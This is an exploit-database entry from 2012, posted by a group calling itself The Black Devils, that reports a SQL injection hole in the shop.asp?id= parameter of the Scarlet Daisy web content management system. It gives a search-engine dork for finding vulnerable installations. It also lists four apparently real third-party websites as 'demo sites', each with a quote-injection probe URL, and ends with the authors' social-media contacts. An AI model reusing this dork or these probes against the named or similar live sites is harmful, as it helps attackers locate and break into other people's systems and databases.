Scarlet Daisy Web Content Management System sql injection Vulnerability

2012-12-04T00:00:00
ID 1337DAY-ID-19882
Type zdt
Reporter The Black Devils
Modified 2012-12-04T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                            # Exploit Title: Scarlet Daisy Web Content Management System sql injection Vulnerability
# Date: 04/12/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://www.scarletdaisy.com/
# Category : [ webapps ]
# Dork : Scarlet Daisy Web Content Management System.  inurl:shop.asp?id=
# Type : asp
# Tested on: [Windows] & [Ubuntu]

-------------------------------

http:\Localhost\shop.asp?id= sql injection

-------------------------------

# Demo site:
http://www.wizardpickups.co.uk/shop.asp?ID='138
http://www.scarletdaisy.com/shop.asp?ID='2
http://scentperfique.com/shop.asp?ID='39
http://www.footstepstours.co.uk/shop.asp?ID='874

#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2018-03-20]  #